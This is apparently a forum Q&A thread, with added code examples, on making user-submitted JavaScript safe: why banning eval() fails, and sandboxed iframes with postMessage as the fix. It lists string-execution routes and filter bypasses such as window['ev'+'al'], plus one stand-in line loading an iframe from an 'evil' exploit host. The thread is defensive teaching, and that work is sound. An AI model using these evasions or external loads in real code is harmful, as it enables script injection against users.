How can I make external code "safe" to run? Just disable eval()?

I would like members of the community to be able to provide their own JavaScript code for use by other users, because the collective imagination of the users is far greater than my own.

But this raises an inherent security issue, especially when the goal is to run external code.

So, can I just ban eval() from submissions and be done with it? Or are there other ways to evaluate code, or otherwise cause massive panic, in JavaScript?

There are other things that need to be disabled too, but my main problem is that if I cannot prevent strings from being executed, any other filter I apply to particular methods can be bypassed. Is this possible at all, or do I have to resort to requiring the author to provide a web service interface?

+5
6 answers

"Or are there other ways to evaluate the code"

Yes. eval() is not the only way to get a string parsed as script. JavaScript is Turing-complete, and, as svinto points out, window.eval can be reached by other names. Other ways of executing a string (not an exhaustive list):

  • new Function('code')()
  • document.write('<script>code</script>')
  • document.createElement('script').appendChild(document.createTextNode('code'))
  • window.setTimeout('code', 0);
  • window.open(...).eval('code')
  • location.href = 'javascript:code'
  • IE: node.setExpression('someproperty', 'code')
  • node.onsomeevent = 'code';
  • Object.prototype.eval('code')

"or cause massive panic in JavaScript?"

document.createElement('iframe').src = 'http://evil.iframeexploitz.ru/aff=2345' ... and so on. Once third-party script is running in your page it can do anything your own script can, so there is no shortage of ways.

"or do I have to resort to requiring the author to provide a web service interface?"

Your options:

  • make them user scripts, as with GreaseMonkey
  • vet each script by hand
  • write your own interpreter for (a subset of) JavaScript

Google Caja is an existing implementation of the last approach: it rewrites submitted code into a restricted, capability-safe subset of JavaScript.

+8

HTML5 introduced the sandbox attribute, which can be used to sandbox JavaScript.

From the OWASP HTML5 Cheat Sheet:

  • Use the sandbox attribute of an iframe for untrusted content.
  • The sandbox attribute of an iframe enables restrictions on content within the iframe. The following restrictions are active when the sandbox attribute is set:

    • All markup is treated as being from a unique origin.

    • All forms and scripts are disabled.

    • All links are prevented from targeting other browsing contexts.
    • All features that trigger automatically are blocked.
    • All plugins are disabled.

      It is possible to have fine-grained control over iframe capabilities using the value of the sandbox attribute.

  • In old versions of user agents where this feature is not supported, the attribute will be ignored. Use this feature as an additional layer of protection, or check whether the browser supports sandboxed frames and only show the untrusted content if it does.

  • Apart from this attribute, to prevent clickjacking attacks and unsolicited framing it is encouraged to use the header X-Frame-Options, which supports the deny and same-origin values. Other solutions like framebusting if(window!== window.top) { window.top.location = location; } are not recommended.

Whether this is enough depends on how much the submitted code needs to interact with the rest of your page, but if the sandbox holds, the worst case is limited to XSS within the sandboxed content (i.e. the IFrame).

eval would still be available, but confined to the sandbox. Communication with the host page can go through window.postMessage. For the other ways of executing code from a string, see @bobince's answer.

+9
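As an added example (not code from the answer above or from the OWASP cheat sheet), here is what the sandboxed-iframe approach looks like from the host page's side: the frame is created with only allow-scripts, the submitted code is embedded so that it cannot break out of the wrapper, and every postMessage reply is checked for the opaque "null" origin and the expected source window before it is trusted. The helper names, the wrapper protocol and the sample submission are assumptions made for this illustration.

```javascript
// Added example, not code from the original answers: a host page that runs a
// community-submitted script in a sandboxed iframe and talks to it with
// postMessage. The helper names (buildSandboxFrameHtml, createSandbox,
// isMessageFromSandbox, runInSandbox) and the sample script are assumptions.

// HTML for the frame. The submitted code is embedded as a JSON string literal,
// with "</" escaped so that a "</script>" inside the submission cannot close
// our wrapper script element and inject markup into the frame.
function buildSandboxFrameHtml(userCode) {
  const literal = JSON.stringify(userCode).replace(/<\//g, '<\\/');
  return `<!doctype html><html><body><script>
window.addEventListener('message', function (ev) {
  var reply;
  try {
    // String-to-code execution is acceptable here: the frame has no
    // allow-same-origin, so it runs in an opaque origin with no access to the
    // host's DOM, cookies or storage.
    reply = { id: ev.data.id, result: new Function('input', ${literal})(ev.data.input) };
  } catch (e) {
    reply = { id: ev.data.id, error: String(e) };
  }
  ev.source.postMessage(reply, '*');
});
<\/script></body></html>`;
}

// Create the frame. Only allow-scripts is granted: no allow-same-origin (which
// would give the script the host's origin and undo the sandbox), and no
// allow-forms, allow-popups or allow-top-navigation.
function createSandbox(userCode, doc) {
  const frame = doc.createElement('iframe');
  frame.setAttribute('sandbox', 'allow-scripts');
  frame.style.display = 'none';
  frame.srcdoc = buildSandboxFrameHtml(userCode);
  doc.body.appendChild(frame);
  return frame;
}

// The check the host must do on every incoming message. A frame without
// allow-same-origin has an opaque origin, which postMessage reports as the
// string "null"; every sandboxed frame shares that, so also require that the
// message came from our frame's own window.
function isMessageFromSandbox(event, frame) {
  return event.origin === 'null' && event.source === frame.contentWindow;
}

// Send input to the frame and resolve with its reply (reject on error/timeout).
// The reply is untrusted data: render it as text, never via innerHTML.
function runInSandbox(frame, input, timeoutMs) {
  return new Promise(function (resolve, reject) {
    const id = Math.random().toString(36).slice(2);
    const timer = setTimeout(function () {
      cleanup();
      reject(new Error('sandbox timed out'));
    }, timeoutMs || 1000);
    function onMessage(ev) {
      if (!isMessageFromSandbox(ev, frame) || !ev.data || ev.data.id !== id) return;
      cleanup();
      if (ev.data.error !== undefined) reject(new Error(ev.data.error));
      else resolve(ev.data.result);
    }
    function cleanup() {
      clearTimeout(timer);
      window.removeEventListener('message', onMessage);
    }
    window.addEventListener('message', onMessage);
    // An opaque origin cannot be named as a target origin, so '*' is used here
    // and the source check in isMessageFromSandbox stands in for it.
    frame.contentWindow.postMessage({ id: id, input: input }, '*');
  });
}

// Usage (browser only): run a constructed submission on some input.
if (typeof document !== 'undefined') {
  const frame = createSandbox(
    "return input.split(',').map(Number).reduce(function (a, b) { return a + b; }, 0)",
    document
  );
  frame.addEventListener('load', function () {
    runInSandbox(frame, '1,2,3').then(function (r) { console.log('sandbox returned', r); });
  });
}
```

Two details matter in practice: the frame must not get allow-same-origin, and the host must key replies on both origin and source, because any other sandboxed frame on the page (or a popup it opened) would also report the "null" origin.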


No, banning eval() is not enough: in JavaScript, eval() is not the only way to run code from a string, and there are HTML routes as well, such as document.write() of a script element, etc.

Either parse the JS yourself and run it under your own restricted interpreter (a sandbox), or take the other route (a web service interface).

+1

Banning the word eval does not help, because it can be reached in other ways, for example: window['ev' + 'al']('alert("hello world");');. There is no practical way to filter eval out...

0
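The point made in bobince's list and in the answer just above (window['ev' + 'al']) can be checked directly. The following is an added example, not code from the thread: a naive textual eval() ban of the kind the question proposes, and a few constructed submissions that get a string executed anyway. The filter, the submissions and the host function are assumptions made for this illustration; the browser-only routes from the list (setTimeout('code'), document.write of a script element, javascript: URLs) are left out so the example also runs under Node.

```javascript
// Added example (not code from the thread): a naive eval() ban and several
// submissions that execute a string anyway. Everything here is constructed.

// The kind of filter the question proposes: reject submissions that mention eval(.
function bansEval(code) {
  return /\beval\s*\(/.test(code);
}

// Constructed submissions. None contains the token "eval(", yet each one parses
// and runs a string as code.
const submissions = {
  // the Function constructor is an eval by another name
  functionConstructor: "return new Function('return 6 * 7')()",
  // the property name is assembled at run time
  computedName: "return globalThis['ev' + 'al']('6 * 7')",
  // same, built from character codes
  fromCharCode: "return globalThis[String.fromCharCode(101, 118, 97, 108)]('6 * 7')",
  // a unicode escape inside the identifier itself: e\u0076al is the identifier eval
  unicodeEscape: "return globalThis.e\\u0076al('6 * 7')",
};

// What an unsandboxed host does with an accepted submission: runs it in-page.
function runUntrusted(code) {
  return new Function(code)();
}

// Apply the filter, then run whatever it let through. Returns, per submission,
// whether it was blocked and what it evaluated to.
function auditFilter(filter, subs) {
  const report = {};
  for (const name of Object.keys(subs)) {
    const blocked = filter(subs[name]);
    report[name] = { blocked: blocked, result: blocked ? undefined : runUntrusted(subs[name]) };
  }
  return report;
}

// Usage: every submission passes the filter and every one evaluates '6 * 7'.
console.log(auditFilter(bansEval, submissions));
```

The filter does catch the literal form (bansEval("eval('x')") is true), which is exactly why it gives false confidence: the token is easy to avoid while the capability remains, and the same holds for any blacklist of method names applied to a Turing-complete language.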

Use an iframe with the sandbox attribute (see above); that is the proper solution.

If you need to interact somehow with the sandboxed code described above, you can use the messaging mechanism. This is a bit complicated, but there are some libraries that simplify the task, including one that I created: https://github.com/asvd/jailed

0